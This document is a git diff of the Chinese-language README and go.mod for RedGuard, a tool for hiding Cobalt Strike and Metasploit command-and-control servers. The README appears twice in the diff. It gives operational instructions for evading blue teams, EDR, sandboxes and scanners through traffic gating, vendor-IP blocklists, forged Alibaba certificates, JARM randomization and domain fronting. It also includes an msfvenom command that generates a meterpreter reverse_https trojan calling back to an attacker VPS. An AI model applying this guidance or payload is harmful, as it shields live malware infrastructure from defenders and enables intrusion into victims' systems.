Malleable File (default "*") - -organization string - Cert Organization (default "Alibaba (China) Technology Co., Ltd.") - -redirect string - Proxy redirect URL (default "https://360.net") - -type string - C2 Server Type (default "CobaltStrike") - -u Enable configuration file modification - -``` - -**P.S. 可以使用参数命令的方式修改配置文件,当然我觉得可能直接vim手动修改更方便。** - -# 0x03 工具使用 - -## 基础拦截 - -如果直接对反向代理的端口进行访问,则会触发拦截规则,这里通过输出的日志可以看到客户端请求根目录,但是因为其请求过程未带有请求的凭证,也就是正确的HOST请求头所以触发了基础拦截的规则,流量被重定向到了https://360.net - -这里为了方便展示输出效果,实际使用可以通过`nohup ./RedGuard &`后台运行。 - -![1653130661(1).png](https://github.com/wikiZ/RedGuardImage/raw/main/1656309416534.png) - -```bash -{"360.net":"http://127.0.0.1:8080","360.com":"https://127.0.0.1:4433"} -``` - -从上面的slice不难看出,360.net对应了代理到本地8080端口,360.com指向了本地的4433端口,且对应了使用的HTTP协议的不同,在后续上线中,需要注意监听器的协议类型需要和这里设置的保持一致,并设置对应HOST请求头。 - -![image.png](https://github.com/wikiZ/RedGuardImage/raw/main/1656309543334.jpg) - -如上图,在未授权情况下,我们得到的响应信息也是重定向的站点返回信息。 - -## 拦截方式 - -上述的基础拦截案例中,使用的是默认的拦截方式,也就是将非法流量以重定向的方式拦截,而通过配置文件的修改,我们可以更改拦截的方式,以及重定向的站点URL,其实这种方式与之说是重定向,描述为劫持、克隆或许更贴切,因为返回的响应状态码为200,是从另一个网站获取响应,以尽可能接近地模仿克隆/劫持的网站。 - -无效数据包可能会根据三种策略被错误路由: - -- **reset**:立即终止 TCP 连接。 -- **proxy**:从另一个网站获取响应,以尽可能接近地模仿克隆/劫持的网站。 -- **redirect**:重定向到指定网站返回HTTP状态码302,对重定向的网站无要求。 - -```bash -# RedGuard interception action: redirect / rest / proxy (Hijack HTTP Response) -drop_action = proxy -# URL to redirect to -Redirect = https://360.net -``` - -配置文件中 **Redirect = URL** 指向的就是劫持的URL地址,RedGuard支持“热更改”,也就是说在工具通过nohup这种方式在后台运行的过程中,我们依旧可以通过修改配置文件的内容进行实时的功能启停。 - -```bash -./RedGuard -u --drop true -``` - -注意,通过命令行修改配置文件的时候。-u选项不要少,否则无法对配置文件修改成功,如果需要还原默认配置文件设置只需要输入 `./RedGuard -u` 即可。 - -而另一种拦截方式就是DROP,直接Close HTTP通信响应,通过设置 **DROP = true** 启用,具体拦截效果如下图: - -![1653132755(1).png](https://github.com/wikiZ/RedGuardImage/raw/main/1656310664285.jpg) - -可以看到,没有获取到HTTP响应码,C2前置流量控制对非法请求直接close响应,在网络空间测绘的探测中,DROP的方式可以实现隐藏端口开放情况的作用,具体效果可以看下面的案例分析。 - -## 代理端口修改 - -这里其实就很好理解了,对配置文件中以下两个参数的配置实现更改反向代理端口的效果,这里建议在不与当前服务器端口冲突的前提下,使用默认的端口隐匿性会更好,如果一定要修改,那么注意参数值的 **:** 不要缺少 - -```bash -# HTTPS Reverse proxy port -Port_HTTPS = :443 -# HTTP Reverse proxy port -Port_HTTP = :80 -``` - -## RedGuard日志 - -通过目标请求的拦截日志分析蓝队溯源行为,可用于跟踪对等连接事件/问题,日志文件生成在运行RedGuard所在目录下,**文件名:RedGuard.log**。 - -![image.png](https://github.com/wikiZ/RedGuardImage/raw/main/1656310909975.jpg) - -## RedGuard获取真实IP地址 - -针对于日常、域前置场景下获取真实请求IP,RG无需进行任何配置,仅需对启动C2设施的profile文件增加以下配置,即通过请求头X-Forwarded-For获取目标真实IP。 - -```bash -http-config { - set trust_x_forwarded_for "true"; -} -``` - -## 请求地域限制 - -配置方式以AllowLocation = 济南,北京 为例,这里值得注意的是,RedGuard提供了两个IP归属地反查的API,一个适用于国内用户,另一个适用于海外用户,并且可以根据输入的地域名动态的分配使用哪个API,如果目标是中国的那么设置的地域就输入中文,反之输入英文地名,建议国内的用户使用中文名即可,这样反查到的归属地准确度以及API的响应速度都是最好的选择。 - -P.S. 国内用户,不要使用**AllowLocation = 济南,beijing**这种方式!没啥意义,参数值的首个字符决定使用哪个API! - -```bash -# IP address owning restrictions example:AllowLocation = 山东,上海,杭州 or shanghai,beijing -AllowLocation = * -``` - -![1653134160(1).png](https://github.com/wikiZ/RedGuardImage/raw/main/1656311033506.jpg) - -决定限制地域之前,可以通过以下命令手动查询IP地址归属地。 - -```bash -./RedGuard --ip 111.14.218.206 -./RedGuard --ip 111.14.218.206 --location shandong # 使用海外API查询归属地 -``` - -这里我们设置仅允许山东地域上线 - -![image.png](https://github.com/wikiZ/RedGuardImage/raw/main/20220521200158-d0d34d6c-d8fd-1.png) - -**合法流量:** - -![1653137496(1).png](https://github.com/wikiZ/RedGuardImage/raw/main/20220521205147-c6bb200a-d904-1.png) - -**非法请求地域:** - -![1653137621(1).png](https://github.com/wikiZ/RedGuardImage/raw/main/20220521205347-0dbc1efa-d905-1.png) - -关于地域限制的上线,在目前的攻防演练可能比较实用,基本上省市级的护网限制的目标都是在指定区域中,而对于其他地域请求的流量自然可以忽略不计,而RedGuard这一功能不仅仅可以限制单一地域也可以根据省、市限制多个上线地域,而对其他地域请求的流量进行拦截。 - -## 基于白名单拦截 - -除了RedGuard内置的安全厂商IP的黑名单,我们还可以依据白名单的方式进行限制,其实我也是建议在web打点的时候,我们可以根据白名单限制上线的IP的地址,以,分割多个IP地址的方式。 - -```bash -# Whitelist list example: AllowIP = 172.16.1.1,192.168.1.1 -AllowIP = 127.0.0.1 -``` - -![image.png](https://github.com/wikiZ/RedGuardImage/raw/main/1656311197849.png) - -如上图,我们限制仅允许127.0.0.1上线,那么其他IP的请求流量就会被拦截。 - -## 基于时间段拦截 - -这个功能就比较有意思了,在配置文件中设置以下参数值,代表了流量控制设施仅可以上午8点至晚上9点上线,这里具体的应用场景也就是在指定攻击时间内,我们允许与C2进行流量交互,其他时间保持静默状态。这也能让红队们睡一个好觉,不用担心一些夜班的蓝队无聊去分析你的木马,然后醒来发生不可描述的事情,哈哈哈。 - -```bash -# Limit the time of requests example: AllowTime = 8:00 - 16:00 -AllowTime = 8:00 - 21:00 -``` - -![image.png](https://github.com/wikiZ/RedGuardImage/raw/main/1656311327769.png) - -## Malleable Profile - -RedGuard采用 Malleable C2 配置文件。然后,它解析提供的可延展配置文件部分以了解合同并仅通过那些满足它的入站请求,同时误导其他请求。诸如`http-stager`,`http-get`和`http-post`它们对应的 uris, headers, User-Agent 等部分都用于区分合法信标的请求和不相关的 Internet 噪声或 IR/AV/EDR 越界数据包。 - -```bash -# C2 Malleable File Path -MalleableFile = /root/cobaltstrike/Malleable.profile -``` - -![image.png](https://github.com/wikiZ/RedGuardImage/raw/main/1656311591693.png) - -风起编写的profile,推荐使用: - -> https://github.com/wikiZ/CobaltStrike-Malleable-Profile - -# 0x04 案例分析 - -## 空间测绘 - -如下图所示,当我们的拦截规则设置为DROP的时候,空间测绘系统探针会对我们反向代理端口的/目录进行几次探测,理论上测绘发送的请求包就是伪造成正常的流量所示。但是当尝试几次因为请求包特征不符合RedGuard的放行要求,所以均被Close HTTP响应。最终展现在测绘平台上的效果也就是认为反向代理端口未开放。 - -![image.png](https://raw.githubusercontent.com/wikiZ/RedGuardImage/main/1656312184116.png) - -下图所示的流量也就是当拦截规则设置为Redirect时,我们会发现当测绘探针收到响应后会继续对我们进行目录扫描,UserAgent为随机,看起来符合正常流量的请求,但是也都成功被拦截了。 - -![image.png](https://github.com/wikiZ/RedGuardImage/raw/main/1656312557035.png) - -**测绘平台 - 劫持响应拦截方式效果:** - -![1653200439(1).jpg](https://github.com/wikiZ/RedGuardImage/raw/main/1656313188878.png) - -**测绘平台 - 重定向拦截方式效果:** - -![1653200439(1).jpg](https://github.com/wikiZ/RedGuardImage/raw/main/1656406644535.jpg) - -## 域前置 - -RedGuard是支持域前置的,在我看来一共有两种展现形式,一种是利用传统的域前置方式,在全站加速回源地址中设置为我们反向代理的端口即可实现。在原有的基础上给域前置增加了流量控制的功能,并且可以根据我们设置的重定向到指定URL使其看起来更像是真的。需要注意HTTPS HOST头RedGuard设置的要与全站加速的域名一致才可以。 - -![1653201007(1).png](https://github.com/wikiZ/RedGuardImage/raw/main/20220522143012-a26ab442-d998-1.png) - -在单兵作战中,我建议可以使用上述方式,而在团队任务中,也可以通过自建“域前置”的方式来实现。 - -![image.png](https://github.com/wikiZ/RedGuardImage/raw/main/20220522143837-cf77a944-d999-1.png) - -在自建域前置中,保持多个反向代理端口一致,HOST头一致指向后端真实的C2服务器监听端口。而这种方式,可以很好的隐藏我们的真实C2服务器,而反向代理的服务器可以通过配置防火墙仅开放代理端口即可。 - -![image.png](https://github.com/wikiZ/RedGuardImage/raw/main/1656313773114.jpg) - -这里可以通过多个节点服务器实现,在CS监听器HTTPS上线IP配置多个我们的节点IP。 - -## CobaltStrike上线 - -如果说上面的这种方式有一个问题就是,实际上线的C2服务器是不能通过防火墙直接拦截掉的,因为在反向代理中实际进行负载均衡请求的是云服务器厂商IP进行的。 - -如果是单兵作战的话,我们可以在云服务器防火墙设置拦截策略。 - -![image.png](https://github.com/wikiZ/RedGuardImage/raw/main/20220522150356-58b9586c-d99d-1.png) - -然后把代理指向的地址设置为https://127.0.0.1:4433这种即可。 - -```bash -{"360.net":"http://127.0.0.1:8080","360.com":"https://127.0.0.1:4433"} -``` - -而且因为我们的基础验证就是基于HTTP HOST请求头来做的,所以在HTTP流量中看到的也是与域前置的方式一致,但是成本更低,只需要一台云服务器即可实现。 - -![image.png](https://github.com/wikiZ/RedGuardImage/raw/main/20220522150942-26f6c264-d99e-1.png) - -对于监听器的设置上线端口设置为RedGuard反向代理端口,监听端口为本机实际上线端口。 - -## Metasploit上线 - -**生成木马** - -```bash -$ msfvenom -p windows/meterpreter/reverse_https LHOST=vpsip LPORT=443 HttpHostHeader=360.com --f exe -o ~/path/to/payload.exe -``` - -当然作为域前置场景也可以把你的LHOST配置为任意使用该厂商CDN的域名,注意设置HttpHostHeader与RedGuard相符即可。 - -```bash -setg OverrideLHOST 360.com -setg OverrideLPORT 443 -setg OverrideRequestHost true -``` - -请务必注意,该`OverrideRequestHost`设置必须设置为`true`。这是由于 Metasploit 在为暂存有效负载生成配置时默认处理传入 HTTP/S 请求的方式的一个怪癖。默认情况下,Metasploit 将传入请求的`Host`标头值(如果存在)用于第二阶段配置,而不是`LHOST`参数。因此,将生成阶段配置,以便将请求直接发送到您的隐藏域名,因为 CloudFront 在转发请求的`Host`标头中传递您的内部域。这显然不是我们所要求的。使用`OverrideRequestHost`配置值,我们可以强制 Metasploit 忽略传入`Host`的标头,而是使用`LHOST`指向原始 CloudFront 域的配置值。 - -监听器设置为实际上线端口,与RedGuard实际转发到的地址相匹配。 - -![867551fe860b10ca1396498a85422b4.jpg](https://github.com/wikiZ/RedGuardImage/raw/main/73315c83562826f16f64e2b277736c1.png) - -RedGuard接收到请求: - -![867551fe860b10ca1396498a85422b4.jpg](https://github.com/wikiZ/RedGuardImage/raw/main/159a00e6c5596bc3542701b4a8020b1.png) - -# 0x05 Loading - -感谢各位用户的支持,RedGuard也会坚持进行完善更新的,希望 RedGuard 能够让更多安全从业者所知,工具参考了RedWarden的设计思想。 - -**欢迎大家多多提出需求,RedGuard也会在这些需求中不断地成长,完善!** - -**关于开发者 风起 相关文章:https://www.anquanke.com/member.html?memberId=148652** - -**Kunyu: https://github.com/knownsec/Kunyu** - -> 风起于青萍之末,浪成于微澜之间。 - - -# 0x06 Community - -如果有问题或者需求可以在项目下提交issue,或通过添加WeCat联系工具作者。 - -![867551fe860b10ca1396498a85422b4.jpg](https://github.com/wikiZ/RedGuardImage/raw/main/20220522141706-ce37e178-d996-1.png) +

RedGuard - Excellent C2 Front Flow Control tool

+ +[![GitHub stars](https://img.shields.io/github/stars/wikiZ/RedGuard)](https://github.com/knownsec/Kunyu) [![GitHub issues](https://img.shields.io/github/issues/wikiZ/RedGuard)](https://github.com/knownsec/Kunyu/issues) [![GitHub release](https://img.shields.io/github/release/wikiZ/RedGuard)](https://github.com/knownsec/Kunyu/releases) [![](https://img.shields.io/badge/author-风起-blueviolet)](https://github.com/wikiZ) + +中文文档 | [English](https://github.com/wikiZ/RedGuard/blob/main/README.md) + +![1653117445(1).png](https://github.com/wikiZ/RedGuardImage/raw/main/42d448a4cd030c05bacb8bde759b5d8.png) + +# 0x00 介绍 + +## 工具介绍 + +RedGuard,是一款C2设施前置流量控制技术的衍生作品,有着更加轻量的设计、高效的流量交互、以及使用go语言开发具有的可靠兼容性。它所解决的核心问题也是在面对日益复杂的红蓝攻防演练行动中,给予攻击队更加优秀的C2基础设施隐匿方案,赋予C2设施的交互流量以流量控制功能,拦截那些“恶意”的分析流量,更好的完成整个攻击任务。 + +RedGuard是一个C2设施前置流量控制工具,可以避免Blue Team,AVS,EDR,Cyberspace Search Engine的检查。 + +## 应用场景 + +- 攻防演练中防守方根据态势感知平台针对C2交互流量的分析溯源 +- 根据JA3指纹库识别防范云沙箱环境下针对木马样本的恶意分析 +- 阻止恶意的请求来实施重放攻击,实现混淆上线的效果 +- 在明确上线服务器IP的情况下,以白名单的方式限制访问交互流量的请求 +- 防范网络空间测绘技术针对C2设施的扫描识别,并重定向或拦截扫描探针的流量 +- 支持对多个C2服务器的前置流量控制,并可实现域前置的效果实现负载均衡上线,达到隐匿的效果 +- 能够通过请求IP反查API接口针对根据 IP 地址的归属地进行地域性的主机上线限制 +- 在不更改源码的情况下,解决分阶段checksum8规则路径解析存在的强特征。 +- 通过目标请求的拦截日志分析蓝队溯源行为,可用于跟踪对等连接事件/问题 +- 具有自定义对样本合法交互的时间段进行设置,实现仅在工作时间段内进行流量交互的功能 +- Malleable C2 Profile 解析器能够严格根据 malleable profile验证入站 HTTP/S 请求,并在违规情况下丢弃外发数据包(支持Malleable Profiles 4.0+) +- 内置大量与安全厂商相关联的设备、蜜罐、云沙箱的IPV4地址黑名单,实现自动拦截重定向请求流量 +- 可通过自定义工具与样本交互的SSL证书信息、重定向URL,以规避工具流量的固定特征 +- .......... + +# 0x01 安装 + +可以直接下载并使用已经编译好的版本,也可以远程下载go包进行自主编译执行。 + +```bash +git clone https://github.com/wikiZ/RedGuard.git +cd RedGuard +# 也可以使用upx压缩编译后的文件体积 +go build -ldflags "-s -w" -trimpath +# 赋予工具可执行权限,并进行初始化操作 +chmod +x ./RedGuard&&./RedGuard + +``` + +# 0x02 配置说明 + +## 初始化 + +如下图,首先对RedGuard赋予可执行权限并进行初始化操作,第一次运行会在当前用户目录下生成配置文件,以实现灵活的功能配置,**配置文件名:.RedGuard_CobaltStrike.ini**。 + +![1653117707(1).png](https://raw.githubusercontent.com/wikiZ/RedGuardImage/main/1656308555577.jpg) + +**配置文件内容:** + +![1653117707(1).png](https://github.com/wikiZ/RedGuardImage/raw/main/1656310498272.png) + +cert的配置选项主要是针对样本与C2前置设施的HTTPS流量交互证书的配置信息,proxy主要用于配置反向代理流量中的控制选项,具体使用会在下面进行详细讲解。 + +在流量的交互中使用的SSL证书会生成在RedGuard执行所在目录下的cert-rsa/目录下,可以通过修改配置文件进行工具的基础功能启停**(证书的序列号是根据时间戳生成的,不用担心被以此关联特征)**。如果你想要使用自己的证书,只需要重命名为ca.crt和ca.key覆盖在cert-rsa/目录下即可。 + +```bash +openssl x509 -in ca.crt -noout -text +``` + +![1653118330(1).png](https://github.com/wikiZ/RedGuardImage/raw/main/1656308972417.jpg) + +每次启动RedGuard都会更新随机TLS JARM指纹,防止被以此佐证C2设施。 + +![1653118330(1).png](https://github.com/wikiZ/RedGuardImage/raw/main/d2d8d30fcd349bd4567c685aaa93451.jpg) + +在使用自己证书的情况下,到配置文件中修改HasCert参数为true,防止因为JARM混淆随机化导致的CipherSuites加密套件与自定义证书不兼容导致的无法正常通信问题。 + +```bash +# Whether to use the certificate you have applied for true/false +HasCert = false +``` + +## RedGuard Usage + +```bash +root@VM-4-13-ubuntu:~# ./RedGuard -h + +Usage of ./RedGuard: + -DropAction string + RedGuard interception action (default "redirect") + -HasCert string + Whether to use the certificate you have applied for (default "false") + -allowIP string + Proxy Requests Allow IP (default "*") + -allowLocation string + Proxy Requests Allow Location (default "*") + -allowTime string + Proxy Requests Allow Time (default "*") + -common string + Cert CommonName (default "*.aliyun.com") + -country string + Cert Country (default "CN") + -dns string + Cert DNSName (default "*.aliyun.com,manager.channel.aliyun.com,*.acs-internal.aliyuncs.com\",*.connect.aliyun.com,aliyun.com,whois.www.net.cn,tianchi-global.com") + -host string + Set Proxy HostTarget (default "{\"360.net\":\"http://127.0.0.1:8080\",\"360.com\":\"https://127.0.0.1:4433\"}") + -http string + Set Proxy HTTP Port (default ":80") + -https string + Set Proxy HTTPS Port (default ":443") + -ip string + IPLookUP IP + -locality string + Cert Locality (default "HangZhou") + -location string + IPLookUP Location (default "风起") + -malleable string + Set Proxy Requests Filter Malleable File (default "*") + -organization string + Cert Organization (default "Alibaba (China) Technology Co., Ltd.") + -redirect string + Proxy redirect URL (default "https://360.net") + -type string + C2 Server Type (default "CobaltStrike") + -u Enable configuration file modification + +``` + +**P.S. 可以使用参数命令的方式修改配置文件,当然我觉得可能直接vim手动修改更方便。** + +# 0x03 工具使用 + +## 基础拦截 + +如果直接对反向代理的端口进行访问,则会触发拦截规则,这里通过输出的日志可以看到客户端请求根目录,但是因为其请求过程未带有请求的凭证,也就是正确的HOST请求头所以触发了基础拦截的规则,流量被重定向到了https://360.net + +这里为了方便展示输出效果,实际使用可以通过`nohup ./RedGuard &`后台运行。 + +![1653130661(1).png](https://github.com/wikiZ/RedGuardImage/raw/main/1656309416534.png) + +```bash +{"360.net":"http://127.0.0.1:8080","360.com":"https://127.0.0.1:4433"} +``` + +从上面的slice不难看出,360.net对应了代理到本地8080端口,360.com指向了本地的4433端口,且对应了使用的HTTP协议的不同,在后续上线中,需要注意监听器的协议类型需要和这里设置的保持一致,并设置对应HOST请求头。 + +![image.png](https://github.com/wikiZ/RedGuardImage/raw/main/1656309543334.jpg) + +如上图,在未授权情况下,我们得到的响应信息也是重定向的站点返回信息。 + +## 拦截方式 + +上述的基础拦截案例中,使用的是默认的拦截方式,也就是将非法流量以重定向的方式拦截,而通过配置文件的修改,我们可以更改拦截的方式,以及重定向的站点URL,其实这种方式与之说是重定向,描述为劫持、克隆或许更贴切,因为返回的响应状态码为200,是从另一个网站获取响应,以尽可能接近地模仿克隆/劫持的网站。 + +无效数据包可能会根据三种策略被错误路由: + +- **reset**:立即终止 TCP 连接。 +- **proxy**:从另一个网站获取响应,以尽可能接近地模仿克隆/劫持的网站。 +- **redirect**:重定向到指定网站返回HTTP状态码302,对重定向的网站无要求。 + +```bash +# RedGuard interception action: redirect / rest / proxy (Hijack HTTP Response) +drop_action = proxy +# URL to redirect to +Redirect = https://360.net +``` + +配置文件中 **Redirect = URL** 指向的就是劫持的URL地址,RedGuard支持“热更改”,也就是说在工具通过nohup这种方式在后台运行的过程中,我们依旧可以通过修改配置文件的内容进行实时的功能启停。 + +```bash +./RedGuard -u --drop true +``` + +注意,通过命令行修改配置文件的时候。-u选项不要少,否则无法对配置文件修改成功,如果需要还原默认配置文件设置只需要输入 `./RedGuard -u` 即可。 + +而另一种拦截方式就是DROP,直接Close HTTP通信响应,通过设置 **DROP = true** 启用,具体拦截效果如下图: + +![1653132755(1).png](https://github.com/wikiZ/RedGuardImage/raw/main/1656310664285.jpg) + +可以看到,没有获取到HTTP响应码,C2前置流量控制对非法请求直接close响应,在网络空间测绘的探测中,DROP的方式可以实现隐藏端口开放情况的作用,具体效果可以看下面的案例分析。 + +## 代理端口修改 + +这里其实就很好理解了,对配置文件中以下两个参数的配置实现更改反向代理端口的效果,这里建议在不与当前服务器端口冲突的前提下,使用默认的端口隐匿性会更好,如果一定要修改,那么注意参数值的 **:** 不要缺少 + +```bash +# HTTPS Reverse proxy port +Port_HTTPS = :443 +# HTTP Reverse proxy port +Port_HTTP = :80 +``` + +## RedGuard日志 + +通过目标请求的拦截日志分析蓝队溯源行为,可用于跟踪对等连接事件/问题,日志文件生成在运行RedGuard所在目录下,**文件名:RedGuard.log**。 + +![image.png](https://github.com/wikiZ/RedGuardImage/raw/main/1656310909975.jpg) + +## RedGuard获取真实IP地址 + +针对于日常、域前置场景下获取真实请求IP,RG无需进行任何配置,仅需对启动C2设施的profile文件增加以下配置,即通过请求头X-Forwarded-For获取目标真实IP。 + +```bash +http-config { + set trust_x_forwarded_for "true"; +} +``` + +## 请求地域限制 + +配置方式以AllowLocation = 济南,北京 为例,这里值得注意的是,RedGuard提供了两个IP归属地反查的API,一个适用于国内用户,另一个适用于海外用户,并且可以根据输入的地域名动态的分配使用哪个API,如果目标是中国的那么设置的地域就输入中文,反之输入英文地名,建议国内的用户使用中文名即可,这样反查到的归属地准确度以及API的响应速度都是最好的选择。 + +P.S. 国内用户,不要使用**AllowLocation = 济南,beijing**这种方式!没啥意义,参数值的首个字符决定使用哪个API! + +```bash +# IP address owning restrictions example:AllowLocation = 山东,上海,杭州 or shanghai,beijing +AllowLocation = * +``` + +![1653134160(1).png](https://github.com/wikiZ/RedGuardImage/raw/main/1656311033506.jpg) + +决定限制地域之前,可以通过以下命令手动查询IP地址归属地。 + +```bash +./RedGuard --ip 111.14.218.206 +./RedGuard --ip 111.14.218.206 --location shandong # 使用海外API查询归属地 +``` + +这里我们设置仅允许山东地域上线 + +![image.png](https://github.com/wikiZ/RedGuardImage/raw/main/20220521200158-d0d34d6c-d8fd-1.png) + +**合法流量:** + +![1653137496(1).png](https://github.com/wikiZ/RedGuardImage/raw/main/20220521205147-c6bb200a-d904-1.png) + +**非法请求地域:** + +![1653137621(1).png](https://github.com/wikiZ/RedGuardImage/raw/main/20220521205347-0dbc1efa-d905-1.png) + +关于地域限制的上线,在目前的攻防演练可能比较实用,基本上省市级的护网限制的目标都是在指定区域中,而对于其他地域请求的流量自然可以忽略不计,而RedGuard这一功能不仅仅可以限制单一地域也可以根据省、市限制多个上线地域,而对其他地域请求的流量进行拦截。 + +## 基于白名单拦截 + +除了RedGuard内置的安全厂商IP的黑名单,我们还可以依据白名单的方式进行限制,其实我也是建议在web打点的时候,我们可以根据白名单限制上线的IP的地址,以,分割多个IP地址的方式。 + +```bash +# Whitelist list example: AllowIP = 172.16.1.1,192.168.1.1 +AllowIP = 127.0.0.1 +``` + +![image.png](https://github.com/wikiZ/RedGuardImage/raw/main/1656311197849.png) + +如上图,我们限制仅允许127.0.0.1上线,那么其他IP的请求流量就会被拦截。 + +## 基于时间段拦截 + +这个功能就比较有意思了,在配置文件中设置以下参数值,代表了流量控制设施仅可以上午8点至晚上9点上线,这里具体的应用场景也就是在指定攻击时间内,我们允许与C2进行流量交互,其他时间保持静默状态。这也能让红队们睡一个好觉,不用担心一些夜班的蓝队无聊去分析你的木马,然后醒来发生不可描述的事情,哈哈哈。 + +```bash +# Limit the time of requests example: AllowTime = 8:00 - 16:00 +AllowTime = 8:00 - 21:00 +``` + +![image.png](https://github.com/wikiZ/RedGuardImage/raw/main/1656311327769.png) + +## Malleable Profile + +RedGuard采用 Malleable C2 配置文件。然后,它解析提供的可延展配置文件部分以了解合同并仅通过那些满足它的入站请求,同时误导其他请求。诸如`http-stager`,`http-get`和`http-post`它们对应的 uris, headers, User-Agent 等部分都用于区分合法信标的请求和不相关的 Internet 噪声或 IR/AV/EDR 越界数据包。 + +```bash +# C2 Malleable File Path +MalleableFile = /root/cobaltstrike/Malleable.profile +``` + +![image.png](https://github.com/wikiZ/RedGuardImage/raw/main/1656311591693.png) + +风起编写的profile,推荐使用: + +> https://github.com/wikiZ/CobaltStrike-Malleable-Profile + +# 0x04 案例分析 + +## 空间测绘 + +如下图所示,当我们的拦截规则设置为DROP的时候,空间测绘系统探针会对我们反向代理端口的/目录进行几次探测,理论上测绘发送的请求包就是伪造成正常的流量所示。但是当尝试几次因为请求包特征不符合RedGuard的放行要求,所以均被Close HTTP响应。最终展现在测绘平台上的效果也就是认为反向代理端口未开放。 + +![image.png](https://raw.githubusercontent.com/wikiZ/RedGuardImage/main/1656312184116.png) + +下图所示的流量也就是当拦截规则设置为Redirect时,我们会发现当测绘探针收到响应后会继续对我们进行目录扫描,UserAgent为随机,看起来符合正常流量的请求,但是也都成功被拦截了。 + +![image.png](https://github.com/wikiZ/RedGuardImage/raw/main/1656312557035.png) + +**测绘平台 - 劫持响应拦截方式效果:** + +![1653200439(1).jpg](https://github.com/wikiZ/RedGuardImage/raw/main/1656313188878.png) + +**测绘平台 - 重定向拦截方式效果:** + +![1653200439(1).jpg](https://github.com/wikiZ/RedGuardImage/raw/main/1656406644535.jpg) + +## 域前置 + +RedGuard是支持域前置的,在我看来一共有两种展现形式,一种是利用传统的域前置方式,在全站加速回源地址中设置为我们反向代理的端口即可实现。在原有的基础上给域前置增加了流量控制的功能,并且可以根据我们设置的重定向到指定URL使其看起来更像是真的。需要注意HTTPS HOST头RedGuard设置的要与全站加速的域名一致才可以。 + +![1653201007(1).png](https://github.com/wikiZ/RedGuardImage/raw/main/20220522143012-a26ab442-d998-1.png) + +在单兵作战中,我建议可以使用上述方式,而在团队任务中,也可以通过自建“域前置”的方式来实现。 + +![image.png](https://github.com/wikiZ/RedGuardImage/raw/main/20220522143837-cf77a944-d999-1.png) + +在自建域前置中,保持多个反向代理端口一致,HOST头一致指向后端真实的C2服务器监听端口。而这种方式,可以很好的隐藏我们的真实C2服务器,而反向代理的服务器可以通过配置防火墙仅开放代理端口即可。 + +![image.png](https://github.com/wikiZ/RedGuardImage/raw/main/1656313773114.jpg) + +这里可以通过多个节点服务器实现,在CS监听器HTTPS上线IP配置多个我们的节点IP。 + +## CobaltStrike上线 + +如果说上面的这种方式有一个问题就是,实际上线的C2服务器是不能通过防火墙直接拦截掉的,因为在反向代理中实际进行负载均衡请求的是云服务器厂商IP进行的。 + +如果是单兵作战的话,我们可以在云服务器防火墙设置拦截策略。 + +![image.png](https://github.com/wikiZ/RedGuardImage/raw/main/20220522150356-58b9586c-d99d-1.png) + +然后把代理指向的地址设置为https://127.0.0.1:4433这种即可。 + +```bash +{"360.net":"http://127.0.0.1:8080","360.com":"https://127.0.0.1:4433"} +``` + +而且因为我们的基础验证就是基于HTTP HOST请求头来做的,所以在HTTP流量中看到的也是与域前置的方式一致,但是成本更低,只需要一台云服务器即可实现。 + +![image.png](https://github.com/wikiZ/RedGuardImage/raw/main/20220522150942-26f6c264-d99e-1.png) + +对于监听器的设置上线端口设置为RedGuard反向代理端口,监听端口为本机实际上线端口。 + +## Metasploit上线 + +**生成木马** + +```bash +$ msfvenom -p windows/meterpreter/reverse_https LHOST=vpsip LPORT=443 HttpHostHeader=360.com +-f exe -o ~/path/to/payload.exe +``` + +当然作为域前置场景也可以把你的LHOST配置为任意使用该厂商CDN的域名,注意设置HttpHostHeader与RedGuard相符即可。 + +```bash +setg OverrideLHOST 360.com +setg OverrideLPORT 443 +setg OverrideRequestHost true +``` + +请务必注意,该`OverrideRequestHost`设置必须设置为`true`。这是由于 Metasploit 在为暂存有效负载生成配置时默认处理传入 HTTP/S 请求的方式的一个怪癖。默认情况下,Metasploit 将传入请求的`Host`标头值(如果存在)用于第二阶段配置,而不是`LHOST`参数。因此,将生成阶段配置,以便将请求直接发送到您的隐藏域名,因为 CloudFront 在转发请求的`Host`标头中传递您的内部域。这显然不是我们所要求的。使用`OverrideRequestHost`配置值,我们可以强制 Metasploit 忽略传入`Host`的标头,而是使用`LHOST`指向原始 CloudFront 域的配置值。 + +监听器设置为实际上线端口,与RedGuard实际转发到的地址相匹配。 + +![867551fe860b10ca1396498a85422b4.jpg](https://github.com/wikiZ/RedGuardImage/raw/main/73315c83562826f16f64e2b277736c1.png) + +RedGuard接收到请求: + +![867551fe860b10ca1396498a85422b4.jpg](https://github.com/wikiZ/RedGuardImage/raw/main/159a00e6c5596bc3542701b4a8020b1.png) + +# 0x05 Loading + +感谢各位用户的支持,RedGuard也会坚持进行完善更新的,希望 RedGuard 能够让更多安全从业者所知,工具参考了RedWarden的设计思想。 + +**欢迎大家多多提出需求,RedGuard也会在这些需求中不断地成长,完善!** + +**关于开发者 风起 相关文章:https://www.anquanke.com/member.html?memberId=148652** + +**Kunyu: https://github.com/knownsec/Kunyu** + +> 风起于青萍之末,浪成于微澜之间。 + + +# 0x06 Community + +如果有问题或者需求可以在项目下提交issue,或通过添加WeCat联系工具作者。 + +![867551fe860b10ca1396498a85422b4.jpg](https://github.com/wikiZ/RedGuardImage/raw/main/20220522141706-ce37e178-d996-1.png) diff --git a/go.mod b/go.mod index 68d0091..f9e8c7f 100644 --- a/go.mod +++ b/go.mod @@ -1,17 +1,17 @@ -module RedGuard - -go 1.15 - -require ( - github.com/D00Movenok/goMalleable v0.0.0-20220314191301-14f91f43c3b0 - github.com/axgle/mahonia v0.0.0-20180208002826-3358181d7394 - github.com/go-ini/ini v1.66.4 - github.com/go-resty/resty/v2 v2.7.0 - github.com/phachon/go-logger v0.0.0-20191215032019-86e4227f71ea - github.com/sleeyax/ja3rp v0.0.1 - github.com/stretchr/testify v1.7.1 // indirect - github.com/tidwall/gjson v1.14.1 - github.com/wxnacy/wgo v1.0.4 -) - -replace github.com/phachon/go-logger v0.0.0-20191215032019-86e4227f71ea => github.com/wikiZ/go-logger v0.0.0-20201128041628-4404a90d93ec +module RedGuard + +go 1.15 + +require ( + github.com/D00Movenok/goMalleable v0.0.0-20220314191301-14f91f43c3b0 + github.com/axgle/mahonia v0.0.0-20180208002826-3358181d7394 + github.com/go-ini/ini v1.66.4 + github.com/go-resty/resty/v2 v2.7.0 + github.com/phachon/go-logger v0.0.0-20191215032019-86e4227f71ea + github.com/sleeyax/ja3rp v0.0.1 + github.com/stretchr/testify v1.7.1 // indirect + github.com/tidwall/gjson v1.14.1 + github.com/wxnacy/wgo v1.0.4 +) + +replace 